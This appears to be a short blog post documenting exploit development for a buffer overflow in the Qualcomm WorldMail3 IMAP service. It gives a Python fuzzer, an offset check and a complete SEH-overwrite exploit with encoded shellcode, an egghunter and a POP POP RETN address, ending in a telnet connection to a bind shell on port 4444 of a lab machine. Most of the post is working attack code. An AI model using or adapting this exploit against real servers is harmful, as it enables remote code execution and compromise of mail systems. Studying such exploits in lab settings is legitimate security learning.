Posted by shinigami at 06:41
Read our previous post
Today I want to learn about buffer overflow on Qualcom Worldmail3.First, I make fuzzer using vulnerable character and command :
a001 LIST }My fuzzer look like this :
#!/usr/bin/python
import socket
buffer = "\x41" * 800
exploit = "a001 LIST " + buffer + "}" + "\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.101",143))
s.recv(1024)
s.send(exploit)
s.close()
Open Ollydbg and attach IMAP4.exe
Application crash? If yes, now goto View->SEH Cain, and press Shift+F9. EIP has been overwrite.
Now time for getting offset, in this case I have found that the offset is 774. So, modify the fuzzer again. Btw you need to restart your Windows.
#!/usr/bin/python
import socket
buffer = "\x41" * 774
buffer += "\xcc" * 4
buffer += "\x41" * (800-len(buffer))
exploit = "a001 LIST " + buffer + "}" + "\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.101",143))
s.recv(1024)
s.send(exploit)
s.close()
Run the Ollydbg and attach IMAP4, then re-run the fuzzer.
What you see? EIP was overwrite with CCCCCC, it's mean that the offset is accurate.
Check the module which not protected by safeseh, in this case the mailcmn.dll is not protected.
Now search the POP POP RETN opcode, please note that the address is not contain 00,0a and 0d.
Now edit the fuzzer for setup the payload :
#!/usr/bin/python
import socket
import os
import time
shellcode = "w00tw00t"
shellcode += ("\xb8\x1d\x77\xf6\x2c\xda\xca\x31\xc9\xb1\x51\xd9\x74\x24\xf4\x5a"
"\x31\x42\x12\x03\x42\x12\x83\xf7\x8b\x14\xd9\xfb\x1e\x32\x6f\xeb"
"\x26\x3b\x8f\x14\xb8\x4f\x1c\xce\x1d\xdb\x98\x32\xd5\xa7\x27\x32"
"\xe8\xb8\xa3\x8d\xf2\xcd\xeb\x31\x02\x39\x5a\xba\x30\x36\x5c\x52"
"\x09\x88\xc6\x06\xee\xc8\x8d\x51\x2e\x02\x60\x5c\x72\x78\x8f\x65"
"\x26\x5b\x58\xec\x23\x28\xc7\x2a\xad\xc4\x9e\xb9\xa1\x51\xd4\xe2"
"\xa5\x64\x01\x1f\xfa\xed\x5c\x73\x26\xee\x3f\x48\x17\xd5\xa4\xc5"
"\x1b\xd9\xaf\x99\x97\x92\xc0\x05\x05\x2f\x60\x3d\x0b\x58\xef\x73"
"\xbd\x74\xbf\x74\x17\xe2\x13\xec\xf0\xd8\xa1\x98\x77\x6c\xf4\x07"
"\x2c\x6d\x28\xdf\x07\x7c\x35\x24\xc8\x80\x10\x05\x61\x9b\xfb\x38"
"\x9c\x6c\x06\x6f\x35\x6f\xf9\x5f\xa1\xb6\x0c\xaa\x9f\x1e\xf0\x82"
"\xb3\xf3\x5d\x79\x67\xb7\x32\x3e\xd4\xc8\x65\xa6\xb2\x27\xda\x40"
"\x10\xc1\x03\x19\xfe\x75\xd9\x51\x38\x22\x21\x47\xac\xdd\x8c\x32"
"\xce\x0e\x46\x18\x9d\x81\x7e\x37\x21\x0b\xd3\xe2\x22\x64\xbc\xe9"
"\x94\x03\x74\xa6\xd9\xda\xd7\x1c\x72\xb6\x28\x4c\xe9\x50\x30\x15"
"\xc8\xd8\xe9\x1a\x02\x4f\xe9\x34\xcd\x1a\x71\xd2\x7a\xb8\x14\x93"
"\x9e\x54\xb7\xfa\x49\x65\xbe\x1b\xe3\x31\x48\x01\xc5\x79\xb9\x6f"
"\xd8\x38\x13\x91\x67\x91\xf8\xe0\x12\xd1\x55\x51\x49\x49\xd8\x5b"
"\x3d\x9c\xe3\xd6\x06\x5e\xcd\x43\xd0\xf2\xa3\x22\x8f\x98\x42\x95"
"\x7e\x08\x14\xea\x51\xda\x3b\xcd\x57\xd5\x17\x12\x81\x83\x68\x13"
"\x19\xab\x47\x60\x31\xaf\xeb\xb2\xda\xb0\x3a\x68\xdc\x9f\xab\xf2"
"\xfa\xc2\x5f\x59\x04\xd4\x5f\x8d") #bad char 00,0a,0d,
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
buffer = "\x90" * (738-len(shellcode))
buffer += shellcode
buffer += "\x90" * 32
buffer += "\xeb\x06\x90\x90"
buffer += "\x4e\x3b\x01\x10"
buffer += egghunter
buffer += "\x90" * (800-len(buffer))
exploit = "a001 LIST " + buffer + "}" + "\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.101",143))
s.recv(1024)
s.send(exploit)
s.close()
print "Waiting for 10 sec ..."
time.sleep(10) #waiting until egghunter proses done, please be patient
print "Try to connect ..."
os.system("telnet 192.168.56.101 4444")
OK, run again the fuzzer. and I got this
No comments:
Post a Comment